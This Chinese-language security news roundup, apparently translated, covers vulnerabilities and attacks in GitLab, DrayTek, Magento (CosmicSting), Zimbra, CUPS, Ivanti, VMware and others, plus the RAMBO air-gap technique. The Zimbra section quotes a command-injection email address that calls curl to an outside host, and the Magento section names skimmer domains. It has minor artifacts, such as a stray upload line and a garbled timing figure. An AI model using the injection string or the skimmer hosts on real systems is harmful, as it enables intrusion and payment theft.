GitLab 发布了社区版（CE）和企业版（EE）的安全更新，以解决八个安全漏洞，包括一个可能允许在任意分支上运行持续集成和持续交付（CI/CD）管道的严重漏洞。

该漏洞的编号为 CVE-2024-9164，CVSS 评分为 9.6（满分 10 分）。

GitLab在一份公告中表示： “GitLab EE 中发现一个问题，影响从 12.5 开始到 17.2.9 之前的所有版本、从 17.3 开始到 17.3.5 之前的所有版本以及从 17.4 开始到 17.4.2 之前的所有版本，该问题允许在任意分支上运行管道。”

在其余七个问题中，四个问题的严重程度评级为高，两个问题的严重程度评级为中等，一个问题的严重程度评级为低 -

CVE-2024-8970（CVSS 评分：8.2），允许攻击者在特定情况下以其他用户身份触发管道
CVE-2024-8977（CVSS 评分：8.2），允许在配置并启用产品分析仪表板的 GitLab EE 实例中发起 SSRF 攻击
CVE-2024-9631（CVSS 评分：7.5），导致查看有冲突的合并请求的差异时速度变慢
CVE-2024-6530（CVSS 评分：7.3），由于跨站点脚本问题，授权新应用程序时会导致 OAuth 页面中出现 HTML 注入
这份公告是 GitLab 近几个月来披露的一系列与管道相关的漏洞中最新的一个。

上个月，该公司解决了另一个严重漏洞（CVE-2024-6678，CVSS 评分：9.9），该漏洞可能允许攻击者以任意用户身份运行管道作业。

在此之前，它还修补了另外三个类似的缺陷——CVE -2023-5009（CVSS 分数：9.6）、CVE-2024-5655（CVSS 分数：9.6）和CVE-2024-6385（CVSS 分数：9.6）。

虽然没有证据表明有人主动利用该漏洞，但建议用户将其实例更新到最新版本以防范潜在威胁。

DrayTek 生产的家用和企业路由器中发现了十几个新的安全漏洞，这些漏洞可被利用来接管易受攻击的设备。

Forescout Vedere Labs 在与 The Hacker News 分享的技术报告中表示：“这些漏洞可能使攻击者通过注入恶意代码来控制路由器，从而使他们在设备上持久驻留并将其用作进入企业网络的网关。”

在这 14 个安全漏洞中，两个被评为严重，九个被评为高严重，三个被评为中等严重。最严重的一个漏洞获得了 CVSS 最高评分 10.0。

它涉及 Web 用户界面中“GetCGI()”函数中的缓冲区溢出错误，该错误可能在处理查询字符串参数时导致拒绝服务 (DoS) 或远程代码执行 (RCE)。

另一个严重的漏洞与用于主机和客户机操作系统之间通信的“recvCmd”二进制文件中的操作系统（OS）命令注入有关。

其余 12 个缺陷如下：

整个系统使用相同的管理员凭据，导致整个系统受到攻击（CVSS 评分：7.5）
Web UI 中存在反射型跨站点脚本 (XSS) 漏洞（CVSS 评分：7.5）
配置登录后自定义问候消息时 Web UI 中存在存储型 XSS 漏洞（CVSS 评分：4.9）
配置显示给用户的自定义路由器名称时，Web UI 中存在存储型 XSS 漏洞（CVSS 评分：4.9）
Web UI 登录页面中的反射型 XSS 漏洞（CVSS 评分：4.9）
Web UI 的 CGI 页面“/cgi-bin/v2x00.cgi”和“/cgi-bin/cgiwcg.cgi”中的缓冲区溢出漏洞导致 DoS 或 RCE（CVSS 评分：7.2）
Web UI 的 CGI 页面中的缓冲区溢出漏洞导致 DoS 或 RCE（CVSS 评分：7.2）
Web UI 的“/cgi-bin/ipfedr.cgi”页面中存在堆栈缓冲区溢出漏洞，可导致 DoS 或 RCE（CVSS 评分：7.2）
Web UI 中存在多个缓冲区溢出漏洞，可导致 DoS 或 RCE（CVSS 评分：7.2）
Web UI 的 ft_payloads_dns() 函数中存在基于堆的缓冲区溢出漏洞，可导致 DoS（CVSS 评分：7.2）
Web UI 中的越界写入漏洞导致 DoS 或 RCE（CVSS 评分：7.2）
Web UI 的 Web 服务器后端存在信息泄露漏洞，可能允许威胁行为者执行中间人 (AitM) 攻击（CVSS 评分：7.6）
Forescout 的分析发现，超过 704,000 台 DrayTek 路由器的 Web UI 暴露在互联网上，使其成为恶意行为者攻击的热门地点。大多数暴露的实例位于美国，其次是越南、荷兰、台湾和澳大利亚。

DrayTek 路由器
在负责任地披露之后，DrayTek发布了针对所有已发现缺陷的补丁，并且还在 11 款停产 (EoL) 型号中解决了最高等级的漏洞。

Forescout 表示：“要完全防范新漏洞，需要修补运行受影响软件的设备。如果路由器上启用了远程访问，请在不需要时禁用它。如果可能，请使用访问控制列表 (ACL) 和双因素身份验证 (2FA)。

目前，澳大利亚、加拿大、德国、日本、荷兰、新西兰、韩国、英国和美国的网络安全机构已为关键基础设施组织发布了联合指导，以帮助维护安全、可靠的运营技术 (OT) 环境。

该文件名为“运营技术网络安全原则”，概述了六条基本规则 -
安全至关重要
了解业务至关重要
OT 数据极其宝贵，需要得到保护
将 OT 与所有其他网络进行分段和隔离
供应链必须安全
人员对于 OT 网络安全至关重要

该机构表示：“快速筛选决策以识别那些影响 OT 安全的决策，将有助于在设计、实施和管理 OT 环境时做出稳健、明智和全面的决策，从而促进安全性和业务连续性。”

网络安全研究人员透露，5% 的 Adob​​e Commerce 和 Magento 商店已被恶意行为者利用名为 CosmicSting 的安全漏洞进行攻击。

该严重漏洞的编号为CVE-2024-34102（CVSS 评分：9.8），与 XML 外部实体引用 (XXE) 漏洞的限制不当有关，可能导致远程代码执行。该漏洞由名为“ spacewasp ”的研究人员发现，并于 2024 年 6 月被 Adob​​e 修补。

荷兰安全公司 Sansec 将CosmicSting描述为“两年来袭击 Magento 和 Adob​​e Commerce 商店的最严重的漏洞”，并表示这些电子商务网站受到攻击的速度为每小时三到五个。

该漏洞此后遭到广泛利用，促使美国网络安全和基础设施安全局 (CISA) 在 2024 年 7 月中旬将其添加到已知利用漏洞 (KEV) 目录中。

其中一些攻击利用该漏洞窃取 Magento 的秘密加密密钥，然后使用该密钥生成具有完全管理 API 访问权限的 JSON Web 令牌 (JWT)。随后，威胁行为者被观察到利用 Magento REST API 注入恶意脚本。

这也意味着，仅仅应用最新的修复不足以抵御攻击，需要网站所有者采取措施轮换加密密钥。

2024 年 8 月观察到的后续攻击将 CosmicSting 与 CNEXT（CVE-2024-2961，GNU C 库（又名 glibc）内的 iconv 库中的漏洞）相结合，以实现远程代码执行。

Sansec指出：“CosmicSting（CVE-2024-34102）允许在未打补丁的系统上读取任意文件。当与 CNEXT（CVE-2024-2961）结合使用时，威胁行为者可以升级到远程代码执行，从而控制整个系统。”

这些攻击的最终目标是通过 GSocket 在主机上建立持久、隐蔽的访问，并插入恶意脚本，允许执行从攻击者那里收到的任意 JavaScript，以窃取用户在网站上输入的支付数据。

最新调查结果显示，雷朋、国家地理、思科、惠而浦和赛格威等多家公司都已成为 CosmicSting 攻击的受害者，至少有七个不同的团体参与了此类攻击 -

Bobry 小组使用空格编码来隐藏执行托管在远程服务器上的付款窃取器的代码
Polyovki 组，使用来自 cdnstatics.net/lib.js 的注入
Surki 组织，利用 XOR 编码隐藏 JavaScript 代码
布隆杜基组织 (Burunduki)，通过 wss://jgueurystatic[.]xyz:8101 的 WebSocket 访问动态 skimmer 代码
Group Ondatry使用自定义 JavaScript 加载恶意软件来注入虚假支付表单，模仿商户网站使用的合法支付表单
Khomyaki 组织将支付信息泄露到包含 2 个字符 URI（“rextension[.]net/za/”）的域名
Belki 组织利用 CosmicSting 和 CNEXT 植入后门和恶意软件
Sansec 表示：“强烈建议商家升级到最新版本的 Magento 或 Adob​​e Commerce。他们还应该轮换秘密加密密钥，并确保旧密钥失效。”

上传中...100%

网络安全研究人员警告称，有人试图针对 Synacor 的 Zimbra Collaboration 中新披露的安全漏洞进行主动攻击。

企业安全公司 Proofpoint 表示，它从 2024 年 9 月 28 日开始观察该活动。此次攻击试图利用CVE-2024-45519，这是 Zimbra 后日志服务中的一个严重安全漏洞，可能使未经身份验证的攻击者能够在受影响的安装上执行任意命令。

Proofpoint 在 X 的一系列帖子中表示：“这些冒充 Gmail 的电子邮件被发送到抄送字段中的虚假地址，试图让 Zimbra 服务器解析这些邮件并将其作为命令执行。这些地址包含使用 sh 实用程序执行的 Base64 字符串。”

Zimbra在 2024 年 9 月 4 日发布的8.8.15 Patch 46、9.0.0 Patch 41、10.0.9 和 10.1.1 版本中解决了这一严重问题。一位名为 lebr0nli（Alan Li）的安全研究员因发现并报告这一缺陷而受到赞誉。

Synacor 安全架构师工程师 Ashish Kataria在 2024 年 9 月 19 日的评论中指出： “虽然在大多数系统上，postjournal 功能可能是可选的或未启用的，但仍然有必要应用提供的补丁来防止潜在的攻击。”

“对于未启用 postjournal 功能且无法立即应用补丁的 Zimbra 系统，可以考虑删除 postjournal 二进制文件作为一种临时措施，直到可以应用补丁为止。”

Proofpoint 表示，它确定了一系列 CC 地址，这些地址在解码后会尝试在位于“/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp”的易受攻击的 Zimbra 服务器上写入 Web shell。

随后，已安装的 Web Shell 将使用预定的 JSESSIONID Cookie 字段来监听入站连接，如果存在，则继续解析 JACTION cookie 以获取 Base64 命令。

Web Shell 配备了通过 exec 执行命令的支持。或者，它也可以通过套接字连接下载并执行文件。截至撰写本文时，尚未将这些攻击归咎于已知的威胁行为者或团体。

话虽如此，攻击活动似乎是在 Project Discovery 发布该漏洞的技术细节后的第二天开始的，该细节称“该漏洞源于未修补版本中未经清理的用户输入被传递给popen，从而使攻击者能够注入任意命令”。

该网络安全公司表示，问题根源在于基于 C 的 postjournal 二进制文件在名为“msg_handler()”的函数中处理和解析收件人电子邮件地址的方式，从而允许在传递带有虚假地址的特制 SMTP 消息（例如“aabbb$(curl${IFS}oast.me)”@mail.domain.com）时对运行在端口 10027 上的服务进行命令注入。

鉴于积极的攻击尝试，强烈建议用户应用最新补丁，以获得最佳的防护以抵御潜在威胁。

Linux 系统上的 OpenPrinting 通用 Unix 打印系统 ( CUPS )中披露了一组新的安全漏洞，这些漏洞可能在某些条件下允许远程命令执行。

安全研究员 Simone Margaritelli 表示：“未经身份验证的远程攻击者可以悄悄地用恶意 URL 替换现有打印机的 IPP URL（或安装新的打印机的 IPP URL），从而导致在（从该计算机）启动打印作业时（在该计算机上）执行任意命令。 ”

CUPS 是一种基于标准的开源打印系统，适用于 Linux 和其他类 Unix 操作系统，包括 ArchLinux、Debian、Fedora、Red Hat Enterprise Linux (RHEL)、ChromeOS、FreeBSD、NetBSD、OpenBSD、openSUSE 和 SUSE Linux。

漏洞列表如下：
CVE-2024-47176 - cups-browsed <= 2.0.1 绑定在 UDP INADDR_ANY:631 上，信任来自任何来源的任何数据包，以触发对攻击者控制的 URL 的 Get-Printer-Attributes IPP 请求
CVE-2024-47076 - libcupsfilters <= 2.1b1 cfGetPrinterAttributes5 未验证或清理从 IPP 服务器返回的 IPP 属性，从而向 CUPS 系统的其余部分提供攻击者控制的数据
CVE-2024-47175 - libppd <= 2.1b1 ppdCreatePPDFromIPP2 在将 IPP 属性写入临时 PPD 文件时未验证或清理 IPP 属性，从而允许在生成的 PPD 中注入攻击者控制的数据
CVE-2024-47177 - cups-filters <= 2.0.1 foomatic-rip 允许通过 FoomaticRIPCommandLine PPD 参数执行任意命令
这些缺陷的最终后果是，它们可能被设计成一个漏洞链，允许攻击者在运行 CUPS 的网络暴露 Linux 系统上创建恶意的、伪造的打印设备，并在发送打印作业时触发远程代码执行。

网络安全公司 Ontinue表示：“该问题是由于‘cups-browsed’组件对‘有新打印机可用’公告处理不当，加上‘cups’对恶意打印资源提供的信息的验证不力造成的。”

“该漏洞源于对网络数据验证不足，允许攻击者让易受攻击的系统安装恶意打印机驱动程序，然后向该驱动程序发送打印作业，从而触发恶意代码的执行。恶意代码以 lp 用户的权限执行，而不是超级用户‘root’。”

RHEL 在一份公告中表示，操作系统的所有版本都受到这四个漏洞的影响，但指出它们在默认配置下不易受攻击。鉴于实际影响可能较小，它将这些问题的严重程度标记为“重要”。

报告称：“通过将这组漏洞组合在一起，攻击者可以实现远程代码执行，从而导致敏感数据被盗和/或关键生产系统受损。”

网络安全公司 Rapid7指出，只有当 UDP 端口 631 可访问且易受攻击的服务正在监听时，受影响的系统才可以被利用，无论是从公共互联网还是跨网段。

Palo Alto Networks透露，其所有产品和云服务均不包含上述 CUPS 相关的软件包，因此不受这些漏洞的影响。

针对这些漏洞的补丁目前正在开发中，预计将在未来几天发布。在此之前，建议在没有必要的情况下禁用和删除 cups-browsed 服务，并阻止或限制对 UDP 端口 631 的流量。

WatchTowr 首席执行官本杰明·哈里斯 (Benjamin Harris) 在与 The Hacker News 分享的声明中表示：“被誉为 Linux 系统末日的、被禁止的 Linux 未授权 RCE 漏洞似乎只会影响一部分系统。”

“鉴于此，虽然这些漏洞在技术影响方面很严重，但运行 CUPS 的台式机/工作站以与典​​型的 Linux 服务器版本相同的方式或数量暴露在互联网上的可能性要小得多。”

Tenable 高级研究工程师 Satnam Narang 表示，这些漏洞还没有达到 Log4Shell 或 Heartbleed 的级别。

“现实情况是，各种软件，无论是开源软件还是闭源软件，都有无数的漏洞尚未被发现和披露，”纳朗说。“安全研究对这一过程至关重要，我们可以也应该要求软件供应商做得更好。”

“对于正在研究这些最新漏洞的组织来说，必须强调的是，最具影响力和最令人担忧的漏洞是已知漏洞，这些漏洞继续被与民族国家有联系的高级持续性威胁团体以及勒索软件分支机构所利用，这些勒索软件分支机构每年从企业窃取数百万美元。”

谷歌透露，作为其安全设计方法的一部分，其向 Rust 等内存安全语言的过渡已导致 Android 中发现的内存安全漏洞百分比在六年内从 76% 下降到 24%。

该科技巨头表示，专注于新功能的安全编码不仅可以降低代码库的整体安全风险，而且还使转换更具“可扩展性和成本效益”。

谷歌的 Jeff Vander Stoep 和 Alex Rebert 在与 The Hacker News 分享的一篇文章中表示，最终，这会导致内存安全漏洞数量下降，因为新的内存不安全开发在一定时间后会放缓，而新的内存安全开发则会占据主导地位。

或许更有趣的是，尽管新的内存不安全代码的数量增加，但内存安全漏洞的数量也会下降。

这种悖论可以通过漏洞呈指数衰减的事实来解释，研究发现，大量漏洞通常存在于新的或最近修改的代码中。

“问题主要在于新代码，因此我们必须从根本上改变代码开发方式，”范德斯托普和雷伯特指出。“随着时间的推移，代码会逐渐成熟，变得更加安全，因此，随着代码变旧，重写等投资的回报也会逐渐减少。”

谷歌早在 2021 年 4 月就正式宣布了在 Android 中支持 Rust 编程语言的计划，并表示它从 2019 年左右开始优先将新开发过渡到内存安全语言。

因此，操作系统中发现的内存安全漏洞数量从2019 年的 223 个下降到 2024 年的不到 50 个。

不言而喻的是，此类缺陷的减少很大程度上归功于对抗这些缺陷的方法的进步，从被动修补到主动缓解，再到使用Clang sanitizers等工具主动发现漏洞。

该科技巨头进一步指出，内存安全策略应该进一步发展，通过纳入安全设计原则，将安全性融入基础，优先考虑“高保证预防”。

“安全编码让我们能够对代码的属性以及基于这些属性可能发生或不可能发生的情况做出强有力的断言，而不是专注于所应用的干预措施（缓解、模糊测试）或试图使用过去的表现来预测未来的安全性。”Vander Stoep 和 Rebert 说。

不仅如此。谷歌表示，它还专注于提供 Rust、C++ 和 Kotlin 之间的互操作性，而不是代码重写，作为一种“实用且渐进的方法”，以拥抱内存安全语言并最终消除整个漏洞类别。

报告称：“在新代码中采用安全编码提供了一种范式转变，使我们能够利用漏洞固有的衰减来发挥我们的优势，即使在现有的大型系统中也是如此。”

“这个概念很简单：一旦我们关闭了新的漏洞，它们就会成倍减少，使我们的所有代码更安全，提高安全设计的有效性，并减轻与现有内存安全策略相关的可扩展性挑战，以便可以更有效地有针对性地应用它们。”

目前，谷歌宣称正在加强与 Arm 产品安全和图形处理单元 (GPU) 工程团队的合作，以标记多个缺陷并提高整个 Android 生态系统中 GPU 软件/固件堆栈的整体安全性。

其中包括在 Pixel 自定义驱动程序代码中发现两个内存问题（CVE-2023-48409 和 CVE-2023-48421），以及在 Arm Valhall GPU 固件和第五代 GPU 架构固件中发现另一个内存问题（CVE-2024-0153）。

谷歌和 Arm表示：“主动测试是一种良好的卫生习惯，因为它可以在新漏洞被利用之前检测并解决它们。”

Microchip 高级软件框架 (ASF) 中披露了一个严重的安全漏洞，如果成功利用，可能会导致远程代码执行。

该漏洞的编号为CVE-2024-7490，CVSS 评分为 9.5（满分 10.0）。该漏洞被描述为 ASF 实现 tinydhcp 服务器时出现的基于堆栈的溢出漏洞，源于缺乏足够的输入验证。

计算机应急响应小组 (CERT) 协调中心 (CERT/CC)在一份公告中表示：“ASF 代码库的所有公开示例中都存在一个漏洞，该漏洞允许特制的 DHCP 请求导致堆栈溢出，从而导致远程代码执行。”

鉴于该软件不再受支持且植根于以物联网为中心的代码，CERT/CC 警告称，该漏洞“很可能在野外许多地方出现”。

该问题影响 ASF 3.52.0.2574 及该软件的所有先前版本，该机构还指出，tinydhcp 软件的多个分支也可能容易受到该漏洞的影响。

目前尚无修复或缓解措施来解决 CVE-2024-7490，除非将 tinydhcp 服务替换为另一个不存在相同问题的服务。

与此同时，SonicWall Capture Labs 详细介绍了影响联发科 Wi-Fi 芯片组的严重零点击漏洞 ( CVE-2024-20017，CVSS 9.8)，由于越界写入问题，该漏洞可能无需任何用户交互即可导致远程代码执行。

该公司表示： “受影响的版本包括联发科 SDK 7.4.0.1 及更早版本，以及 OpenWrt 19.07 和 21.02。” “这意味着各种各样的设备都存在漏洞，包括路由器和智能手机。”

“该漏洞是一种缓冲区溢出，它是由于攻击者直接从受控的数据包数据中获取长度值而没有进行边界检查，并将其放入内存副本中造成的。这种缓冲区溢出会导致越界写入。”

联发科于 2024 年 3 月发布了针对该漏洞的补丁，但随着截至 2024 年 8 月 30 日概念验证 (PoC) 漏洞公开发布，利用该漏洞的可能性有所增加。

Ivanti 透露，影响云服务设备 (CSA) 的一个严重安全漏洞正在遭到广泛利用。

这个新漏洞的 CVE 标识符为 CVE-2024-8963，CVSS 评分为 9.4（满分 10.0）。该公司在 CSA 4.6 Patch 519 和 CSA 5.0 中“顺便解决了”这个问题。

该公司在周四的公告中表示： “Ivanti CSA 4.6 Patch 519 之前的版本中的路径遍历允许未经身份验证的远程攻击者访问受限功能。”

它还指出，该漏洞可能与CVE-2024-8190 （CVSS 评分：7.2）有关，允许攻击者绕过管理员身份验证并在设备上执行任意命令。

Ivanti 进一步警告称，该公司“知道有有限数量的客户被此漏洞利用”，几天前该公司披露了针对 CVE-2024-8190 的主动利用尝试。

这表明该活动背后的威胁行为者正在结合这两个缺陷来实现在易受攻击的设备上执行代码。

这一进展促使美国网络安全和基础设施安全局 (CISA) 将该漏洞添加到其已知被利用漏洞 ( KEV ) 目录中，要求联邦机构在 2024 年 10 月 10 日之前应用修复程序。

强烈建议用户尽快升级到 CSA 版本 5.0，因为版本 4.6 已经停止使用且不再受支持。

博通周二发布了更新，以解决影响 VMware vCenter Server 的严重安全漏洞，该漏洞可能为远程代码执行铺平道路。

该漏洞的编号为 CVE-2024-38812（CVSS 评分：9.8），被描述为DCE/RPC 协议中的堆溢出漏洞。

该虚拟化服务提供商在公告中表示： “具有 vCenter Server 网络访问权限的恶意行为者可能会通过发送特制的网络数据包来触发此漏洞，从而可能导致远程代码执行。”

该缺陷与 VMware 于 2024 年 6 月在 vCenter Server 中解决的另外两个远程代码执行缺陷CVE-2024-37079 和 CVE-2024-37080（CVSS 评分：9.8）类似。

VMware 还解决了 vCenter Server 中的一个权限提升漏洞 (CVE-2024-38813，CVSS 评分：7.5)，该漏洞可能使具有实例网络访问权限的恶意行为者通过发送特制的网络数据包将权限提升到 root 权限。

TZL 团队的安全研究人员 zbl 和 srs 在 2024 年 6 月在中国举行的Matrix Cup网络安全竞赛期间发现并报告了这两个漏洞。它们已在以下版本中得到修复 -

vCenter Server 8.0（已在 8.0 U3b 中修复）
vCenter Server 7.0（已在 7.0 U3 中修复）
VMware Cloud Foundation 5.x（在 8.0 U3b 中作为异步补丁修复）
VMware Cloud Foundation 4.x（在 7.0 U3 中作为异步补丁修复）
博通表示，尚未发现这两个漏洞被恶意利用，但已敦促客户将其安装更新至最新版本，以防范潜在威胁。

该公司表示：“这些漏洞是内存管理和损坏问题，可用于攻击 VMware vCenter 服务，可能允许远程代码执行。”

与此同时，美国网络安全和基础设施安全局 (CISA) 和联邦调查局 (FBI) 发布联合咨询报告，敦促各机构努力消除威胁行为者可能利用来破坏系统的跨站点脚本 (XSS) 漏洞。

政府机构表示： “当制造商未能正确验证、清理或转义输入时，就会出现跨站点脚本漏洞。” “这些故障允许威胁行为者将恶意脚本注入 Web 应用程序，利用它们在不同环境中操纵、窃取或滥用数据。”

人们发现一种新型的侧信道攻击利用设备随机存取存储器 (RAM) 发出的无线电信号作为数据泄露机制，对隔离网络构成威胁。

该技术的代号为“RAMBO ”（“辐射间隙内存总线进攻”的缩写），由以色列内盖夫本·古里安大学软件与信息系统工程系进攻性网络研究实验室负责人 Mordechai Guri 博士命名。

Guri 博士在一篇新发表的研究论文中表示： “利用软件生成的无线电信号，恶意软件可以对文件、图像、键盘记录、生物特征信息和加密密钥等敏感信息进行编码。”

“利用软件定义无线电 (SDR) 硬件和简单的现成天线，攻击者可以从远处拦截传输的原始无线电信号。然后可以解码信号并将其转换回二进制信息。”

多年来，Guri 博士利用串行 ATA 电缆（SATAn）、MEMS 陀螺仪（GAIROSCOPE）、网络接口卡上的 LED（ETHERLED）和动态功耗（COVID-bit），设计了各种机制从离线网络中提取机密数据。

研究人员设计的其他一些非常规方法包括通过图形处理单元 (GPU) 风扇 ( GPU-FAN ) 产生的隐蔽声学信号、内置主板蜂鸣器 ( EL-GRILLO ) 产生的 (超) 声波，甚至打印机显示面板和状态 LED ( PrinterLeak )，从隔离网络泄露数据。

去年，Guri 博士还演示了AirKeyLogger，这是一种无硬件射频键盘记录攻击，它利用计算机电源的无线电发射向远程攻击者泄露实时按键数据。

古里博士在研究中指出：“为了泄露机密数据，处理器的工作频率被操纵，从而产生由按键调制的电源单元电磁辐射模式。按键信息可以通过射频接收器或带有简单天线的智能手机在几米外接收。”

与此类攻击一样，它需要首先通过其他方式（例如内部恶意人员、中毒的 USB 驱动器或供应链攻击）破坏 隔离网络，从而允许恶意软件触发隐蔽的数据泄露通道。

RAMBO 也不例外，该恶意软件用于操纵 RAM，使其能够生成时钟频率的无线电信号，然后使用曼彻斯特编码对其进行编码并传输，以便从远处接收。

编码数据可能包括按键、文档和生物特征信息。然后，另一端的攻击者可以利用 SDR 接收电磁信号，解调和解码数据，并检索窃取的信息。

Guri 博士说：“该恶意软件利用 RAM 的电磁辐射来调制信息并将其向外传输。远程攻击者使用无线电接收器和天线可以接收信息，对其进行解调，并将其解码为原始的二进制或文本表示。”

研究发现，该技术可用于以每秒 1,000 位的速度泄露运行 Intel i7 3.6GHz CPU 和 16 GB RAM 的隔离计算机的数据，并以每个按键 16 位的速度实时泄露按键信息。

Guri 博士表示：“低速时，4096 位 RSA 加密密钥可在 41.96 秒内被窃取，高速时则为 4.096 位。生物特征信息、小文件 (.jpg) 和小文档 (.txt 和 .docx) 在低速时需要 400 秒，在高速时则只需几秒钟。”

“这表明，RAMBO 隐蔽通道可用于在短时间内泄露相对简短的信息。”

阻止攻击的对策包括对信息传输实施“红黑”区域限制、使用入侵检测系统 (IDS)、监控虚拟机管理程序级内存访问、使用无线电干扰器阻止无线通信以及使用法拉第笼。